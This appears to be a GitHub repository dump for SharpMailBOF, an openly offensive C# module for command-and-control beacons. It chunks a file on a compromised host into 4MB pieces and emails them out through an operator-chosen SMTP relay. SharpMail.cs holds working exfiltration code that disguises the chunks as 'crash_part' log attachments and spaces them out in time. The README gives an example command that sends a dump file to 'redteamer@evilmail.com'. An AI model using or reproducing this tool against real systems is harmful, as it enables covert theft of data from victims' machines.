├── .gitignore ├── README.md ├── SharpMailBOF.sln └── SharpMailBOF ├── Program.cs ├── Properties └── AssemblyInfo.cs ├── SharpMail.cs └── SharpMailBOF.csproj /.gitignore: -------------------------------------------------------------------------------- 1 | ## Ignore Visual Studio temporary files, build results, and 2 | ## files generated by popular Visual Studio add-ons. 3 | ## 4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore 5 | 6 | # User-specific files 7 | *.rsuser 8 | *.suo 9 | *.user 10 | *.userosscache 11 | *.sln.docstates 12 | 13 | # User-specific files (MonoDevelop/Xamarin Studio) 14 | *.userprefs 15 | 16 | # Mono auto generated files 17 | mono_crash.* 18 | 19 | # Build results 20 | [Dd]ebug/ 21 | [Dd]ebugPublic/ 22 | [Rr]elease/ 23 | [Rr]eleases/ 24 | x64/ 25 | x86/ 26 | [Ww][Ii][Nn]32/ 27 | [Aa][Rr][Mm]/ 28 | [Aa][Rr][Mm]64/ 29 | bld/ 30 | [Bb]in/ 31 | [Oo]bj/ 32 | [Ll]og/ 33 | [Ll]ogs/ 34 | 35 | # Visual Studio 2015/2017 cache/options directory 36 | .vs/ 37 | # Uncomment if you have tasks that create the project's static files in wwwroot 38 | #wwwroot/ 39 | 40 | # Visual Studio 2017 auto generated files 41 | Generated\ Files/ 42 | 43 | # MSTest test Results 44 | [Tt]est[Rr]esult*/ 45 | [Bb]uild[Ll]og.* 46 | 47 | # NUnit 48 | *.VisualState.xml 49 | TestResult.xml 50 | nunit-*.xml 51 | 52 | # Build Results of an ATL Project 53 | [Dd]ebugPS/ 54 | [Rr]eleasePS/ 55 | dlldata.c 56 | 57 | # Benchmark Results 58 | BenchmarkDotNet.Artifacts/ 59 | 60 | # .NET Core 61 | project.lock.json 62 | project.fragment.lock.json 63 | artifacts/ 64 | 65 | # ASP.NET Scaffolding 66 | ScaffoldingReadMe.txt 67 | 68 | # StyleCop 69 | StyleCopReport.xml 70 | 71 | # Files built by Visual Studio 72 | *_i.c 73 | *_p.c 74 | *_h.h 75 | *.ilk 76 | *.meta 77 | *.obj 78 | *.iobj 79 | *.pch 80 | *.pdb 81 | *.ipdb 82 | *.pgc 83 | *.pgd 84 | *.rsp 85 | *.sbr 86 | *.tlb 87 | *.tli 88 | *.tlh 89 | *.tmp 90 | *.tmp_proj 91 | *_wpftmp.csproj 92 | *.log 93 | *.tlog 94 | *.vspscc 95 | *.vssscc 96 | .builds 97 | *.pidb 98 | *.svclog 99 | *.scc 100 | 101 | # Chutzpah Test files 102 | _Chutzpah* 103 | 104 | # Visual C++ cache files 105 | ipch/ 106 | *.aps 107 | *.ncb 108 | *.opendb 109 | *.opensdf 110 | *.sdf 111 | *.cachefile 112 | *.VC.db 113 | *.VC.VC.opendb 114 | 115 | # Visual Studio profiler 116 | *.psess 117 | *.vsp 118 | *.vspx 119 | *.sap 120 | 121 | # Visual Studio Trace Files 122 | *.e2e 123 | 124 | # TFS 2012 Local Workspace 125 | $tf/ 126 | 127 | # Guidance Automation Toolkit 128 | *.gpState 129 | 130 | # ReSharper is a .NET coding add-in 131 | _ReSharper*/ 132 | *.[Rr]e[Ss]harper 133 | *.DotSettings.user 134 | 135 | # TeamCity is a build add-in 136 | _TeamCity* 137 | 138 | # DotCover is a Code Coverage Tool 139 | *.dotCover 140 | 141 | # AxoCover is a Code Coverage Tool 142 | .axoCover/* 143 | !.axoCover/settings.json 144 | 145 | # Coverlet is a free, cross platform Code Coverage Tool 146 | coverage*.json 147 | coverage*.xml 148 | coverage*.info 149 | 150 | # Visual Studio code coverage results 151 | *.coverage 152 | *.coveragexml 153 | 154 | # NCrunch 155 | _NCrunch_* 156 | .*crunch*.local.xml 157 | nCrunchTemp_* 158 | 159 | # MightyMoose 160 | *.mm.* 161 | AutoTest.Net/ 162 | 163 | # Web workbench (sass) 164 | .sass-cache/ 165 | 166 | # Installshield output folder 167 | [Ee]xpress/ 168 | 169 | # DocProject is a documentation generator add-in 170 | DocProject/buildhelp/ 171 | DocProject/Help/*.HxT 172 | DocProject/Help/*.HxC 173 | DocProject/Help/*.hhc 174 | DocProject/Help/*.hhk 175 | DocProject/Help/*.hhp 176 | DocProject/Help/Html2 177 | DocProject/Help/html 178 | 179 | # Click-Once directory 180 | publish/ 181 | 182 | # Publish Web Output 183 | *.[Pp]ublish.xml 184 | *.azurePubxml 185 | # Note: Comment the next line if you want to checkin your web deploy settings, 186 | # but database connection strings (with potential passwords) will be unencrypted 187 | *.pubxml 188 | *.publishproj 189 | 190 | # Microsoft Azure Web App publish settings. Comment the next line if you want to 191 | # checkin your Azure Web App publish settings, but sensitive information contained 192 | # in these scripts will be unencrypted 193 | PublishScripts/ 194 | 195 | # NuGet Packages 196 | *.nupkg 197 | # NuGet Symbol Packages 198 | *.snupkg 199 | # The packages folder can be ignored because of Package Restore 200 | **/[Pp]ackages/* 201 | # except build/, which is used as an MSBuild target. 202 | !**/[Pp]ackages/build/ 203 | # Uncomment if necessary however generally it will be regenerated when needed 204 | #!**/[Pp]ackages/repositories.config 205 | # NuGet v3's project.json files produces more ignorable files 206 | *.nuget.props 207 | *.nuget.targets 208 | 209 | # Nuget personal access tokens and Credentials 210 | nuget.config 211 | 212 | # Microsoft Azure Build Output 213 | csx/ 214 | *.build.csdef 215 | 216 | # Microsoft Azure Emulator 217 | ecf/ 218 | rcf/ 219 | 220 | # Windows Store app package directories and files 221 | AppPackages/ 222 | BundleArtifacts/ 223 | Package.StoreAssociation.xml 224 | _pkginfo.txt 225 | *.appx 226 | *.appxbundle 227 | *.appxupload 228 | 229 | # Visual Studio cache files 230 | # files ending in .cache can be ignored 231 | *.[Cc]ache 232 | # but keep track of directories ending in .cache 233 | !?*.[Cc]ache/ 234 | 235 | # Others 236 | ClientBin/ 237 | ~$* 238 | *~ 239 | *.dbmdl 240 | *.dbproj.schemaview 241 | *.jfm 242 | *.pfx 243 | *.publishsettings 244 | orleans.codegen.cs 245 | 246 | # Including strong name files can present a security risk 247 | # (https://github.com/github/gitignore/pull/2483#issue-259490424) 248 | #*.snk 249 | 250 | # Since there are multiple workflows, uncomment next line to ignore bower_components 251 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) 252 | #bower_components/ 253 | 254 | # RIA/Silverlight projects 255 | Generated_Code/ 256 | 257 | # Backup & report files from converting an old project file 258 | # to a newer Visual Studio version. Backup files are not needed, 259 | # because we have git ;-) 260 | _UpgradeReport_Files/ 261 | Backup*/ 262 | UpgradeLog*.XML 263 | UpgradeLog*.htm 264 | ServiceFabricBackup/ 265 | *.rptproj.bak 266 | 267 | # SQL Server files 268 | *.mdf 269 | *.ldf 270 | *.ndf 271 | 272 | # Business Intelligence projects 273 | *.rdl.data 274 | *.bim.layout 275 | *.bim_*.settings 276 | *.rptproj.rsuser 277 | *- [Bb]ackup.rdl 278 | *- [Bb]ackup ([0-9]).rdl 279 | *- [Bb]ackup ([0-9][0-9]).rdl 280 | 281 | # Microsoft Fakes 282 | FakesAssemblies/ 283 | 284 | # GhostDoc plugin setting file 285 | *.GhostDoc.xml 286 | 287 | # Node.js Tools for Visual Studio 288 | .ntvs_analysis.dat 289 | node_modules/ 290 | 291 | # Visual Studio 6 build log 292 | *.plg 293 | 294 | # Visual Studio 6 workspace options file 295 | *.opt 296 | 297 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.) 298 | *.vbw 299 | 300 | # Visual Studio LightSwitch build output 301 | **/*.HTMLClient/GeneratedArtifacts 302 | **/*.DesktopClient/GeneratedArtifacts 303 | **/*.DesktopClient/ModelManifest.xml 304 | **/*.Server/GeneratedArtifacts 305 | **/*.Server/ModelManifest.xml 306 | _Pvt_Extensions 307 | 308 | # Paket dependency manager 309 | .paket/paket.exe 310 | paket-files/ 311 | 312 | # FAKE - F# Make 313 | .fake/ 314 | 315 | # CodeRush personal settings 316 | .cr/personal 317 | 318 | # Python Tools for Visual Studio (PTVS) 319 | __pycache__/ 320 | *.pyc 321 | 322 | # Cake - Uncomment if you are using it 323 | # tools/** 324 | # !tools/packages.config 325 | 326 | # Tabs Studio 327 | *.tss 328 | 329 | # Telerik's JustMock configuration file 330 | *.jmconfig 331 | 332 | # BizTalk build output 333 | *.btp.cs 334 | *.btm.cs 335 | *.odx.cs 336 | *.xsd.cs 337 | 338 | # OpenCover UI analysis results 339 | OpenCover/ 340 | 341 | # Azure Stream Analytics local run output 342 | ASALocalRun/ 343 | 344 | # MSBuild Binary and Structured Log 345 | *.binlog 346 | 347 | # NVidia Nsight GPU debugger configuration file 348 | *.nvuser 349 | 350 | # MFractors (Xamarin productivity tool) working folder 351 | .mfractor/ 352 | 353 | # Local History for Visual Studio 354 | .localhistory/ 355 | 356 | # BeatPulse healthcheck temp database 357 | healthchecksdb 358 | 359 | # Backup folder for Package Reference Convert tool in Visual Studio 2017 360 | MigrationBackup/ 361 | 362 | # Ionide (cross platform F# VS Code tools) working folder 363 | .ionide/ 364 | 365 | # Fody - auto-generated XML schema 366 | FodyWeavers.xsd 367 | 368 | # VS Code files for those working on multiple tools 369 | .vscode/* 370 | !.vscode/settings.json 371 | !.vscode/tasks.json 372 | !.vscode/launch.json 373 | !.vscode/extensions.json 374 | *.code-workspace 375 | 376 | # Local History for Visual Studio Code 377 | .history/ 378 | 379 | # Windows Installer files from build outputs 380 | *.cab 381 | *.msi 382 | *.msix 383 | *.msm 384 | *.msp 385 | 386 | # JetBrains Rider 387 | .idea/ 388 | *.sln.iml 389 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # SharpMailBOF 2 | 3 | SharpMailBOF is a quick and dirty [BOF.NET](https://github.com/CCob/BOF.NET) (Thanks CCob!) module that can be used to break a file into smaller chunks and email them as attachments to a specified recipient using an SMTP relay of your choosing. This can be used as an alternate data exfiltration method to speed up reciving large files when you are operating with a low/slow sleep setting. 4 | 5 | ## Syntax 6 | ``` 7 | bofnet_init 8 | bofnet_load [Path_to_DLL] 9 | bofnet_execute BOFNET.Bofs.SharMailBof [SMTP_SERVER] [PORT] [RECIPIENT] [SENDER] [SUBJECT] [BODY] [PATH] 10 | ``` 11 | ## Example 12 | ``` 13 | bofnet_execute BOFNET.Bofs.SHarpMailBof mail.example.com 25 redteamer@evilmail.com noreply@example.com "Test" "This is only a test." "C:\Path\dump.txt" 14 | ``` 15 | 16 | ## Notes 17 | 18 | **DO NOT PANIC** if your beacon does not call back. It will not call back until it has finished sending a series of emails + the time your normal sleep time takes. So if your sleep time is set to 30 minutes and you send a 30MB file, it could still take some time but, it will be much faster than trying to use the inbuilt download feature. 19 | 20 | This BOF.NET module will delay checking of your beacon. The default delay between messages is 10 minutes and the default file size is 5MB. You can adjust this to fit your needs. At some point I may add the option to specify the delay and attachment sizes. 21 | -------------------------------------------------------------------------------- /SharpMailBOF.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.30907.101 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SharpMailBOF", "SharpMailBOF\SharpMailBOF.csproj", "{DEC8A3F8-190D-4386-A699-B7E8D89F0091}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Debug|x64 = Debug|x64 12 | Release|Any CPU = Release|Any CPU 13 | Release|x64 = Release|x64 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {DEC8A3F8-190D-4386-A699-B7E8D89F0091}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 17 | {DEC8A3F8-190D-4386-A699-B7E8D89F0091}.Debug|Any CPU.Build.0 = Debug|Any CPU 18 | {DEC8A3F8-190D-4386-A699-B7E8D89F0091}.Debug|x64.ActiveCfg = Debug|x64 19 | {DEC8A3F8-190D-4386-A699-B7E8D89F0091}.Debug|x64.Build.0 = Debug|x64 20 | {DEC8A3F8-190D-4386-A699-B7E8D89F0091}.Release|Any CPU.ActiveCfg = Release|Any CPU 21 | {DEC8A3F8-190D-4386-A699-B7E8D89F0091}.Release|Any CPU.Build.0 = Release|Any CPU 22 | {DEC8A3F8-190D-4386-A699-B7E8D89F0091}.Release|x64.ActiveCfg = Release|x64 23 | {DEC8A3F8-190D-4386-A699-B7E8D89F0091}.Release|x64.Build.0 = Release|x64 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {339FECD2-8224-497D-A0FE-03AD4292F744} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /SharpMailBOF/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | 3 | namespace BOFNET.Bofs 4 | { 5 | public class SharpMailBof : BeaconObject 6 | { 7 | public SharpMailBof(BeaconApi api) : base(api) { } 8 | public override void Go(string[] args) 9 | { 10 | try 11 | { 12 | string mailResults = SharpMail.SharpMailSend.Send(args); 13 | BeaconConsole.Write(mailResults); 14 | } 15 | catch (Exception e) 16 | { 17 | BeaconConsole.WriteLine($"Unhandled terminating exception: {e}"); 18 | } 19 | } 20 | } 21 | } 22 | -------------------------------------------------------------------------------- /SharpMailBOF/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("SharpMailBOF")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("Vagrant")] 12 | [assembly: AssemblyProduct("SharpMailBOF")] 13 | [assembly: AssemblyCopyright("Copyright © Vagrant 2021")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("dec8a3f8-190d-4386-a699-b7e8d89f0091")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /SharpMailBOF/SharpMail.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.Net.Mail; 6 | using System.Net.Mime; 7 | using System.IO; 8 | using System.Threading; 9 | 10 | namespace SharpMail 11 | { 12 | class SharpMailSend 13 | { 14 | public static string Send(string[] args) 15 | { 16 | StringWriter strWriter = new StringWriter(); 17 | 18 | if (args.Length < 6) 19 | { 20 | strWriter.WriteLine(args.Length); 21 | return strWriter.ToString(); 22 | } 23 | 24 | string mailserver = args[0]; 25 | int port = Int32.Parse(args[1]); 26 | string mailrecipient = args[2]; 27 | string mailfrom = args[3]; 28 | string mailsubject = args[4]; 29 | string mailbody = args[5]; 30 | 31 | strWriter.WriteLine("Attempting to send email to: {0}", mailrecipient); 32 | 33 | try 34 | { 35 | if (args.Length == 7) 36 | { 37 | Stream fileData = File.OpenRead(args[6]); 38 | //int chunkSize = 4194304; 39 | 40 | if (fileData.Length > (4194304)) 41 | { 42 | const int BUFFER_SIZE = 4194304; 43 | 44 | 45 | int index = 0; 46 | int bytesRead = 0; 47 | byte[] buffer = new byte[BUFFER_SIZE]; 48 | while (fileData.Position < fileData.Length) 49 | { 50 | //while (remaining > 0 && (bytesRead = fileData.Read(buffer, 0, intNextChunk)) > 0) 51 | while ((bytesRead = fileData.Read(buffer, 0, BUFFER_SIZE)) > 0) 52 | { 53 | MailMessage mail = new MailMessage(); 54 | SmtpClient SmtpServer = new SmtpClient(mailserver); 55 | mail.From = new MailAddress(mailfrom); 56 | mail.To.Add(mailrecipient); 57 | mail.Subject = mailsubject; 58 | mail.Body = mailbody; 59 | using (MemoryStream ms = new MemoryStream(buffer, 0, bytesRead)) 60 | { 61 | mail.Attachments.Add(new Attachment(ms, String.Format("crash_part{0}.log", index))); 62 | SmtpServer.Port = port; 63 | strWriter.WriteLine("Sending the email."); 64 | SmtpServer.Send(mail); 65 | } 66 | mail.Dispose(); 67 | index++; 68 | // Delay between emails in miliseconds 69 | Thread.Sleep(600000); 70 | } 71 | } 72 | } 73 | } 74 | } 75 | catch (Exception ex) 76 | { 77 | strWriter.WriteLine(ex.ToString()); 78 | Console.WriteLine(ex.ToString()); 79 | return strWriter.ToString(); 80 | } 81 | strWriter.WriteLine("Successfully send email."); 82 | return strWriter.ToString(); 83 | } 84 | } 85 | } 86 | -------------------------------------------------------------------------------- /SharpMailBOF/SharpMailBOF.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {DEC8A3F8-190D-4386-A699-B7E8D89F0091} 8 | Library 9 | SharpMailBOF 10 | SharpMailBOF 11 | v3.5 12 | 512 13 | true 14 | 15 | 16 | AnyCPU 17 | true 18 | full 19 | false 20 | bin\Debug\ 21 | DEBUG;TRACE 22 | prompt 23 | 4 24 | 25 | 26 | AnyCPU 27 | pdbonly 28 | true 29 | bin\Release\ 30 | TRACE 31 | prompt 32 | 4 33 | 34 | 35 | true 36 | bin\x64\Debug\ 37 | DEBUG;TRACE 38 | full 39 | x64 40 | 7.3 41 | prompt 42 | 43 | 44 | bin\x64\Release\ 45 | TRACE 46 | true 47 | pdbonly 48 | x64 49 | 7.3 50 | prompt 51 | 52 | 53 | 54 | 55 | 56 | 57 | C:\Users\admin-user\Documents\BOF.NET-main\dist\net35\BOFNET.dll 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | --------------------------------------------------------------------------------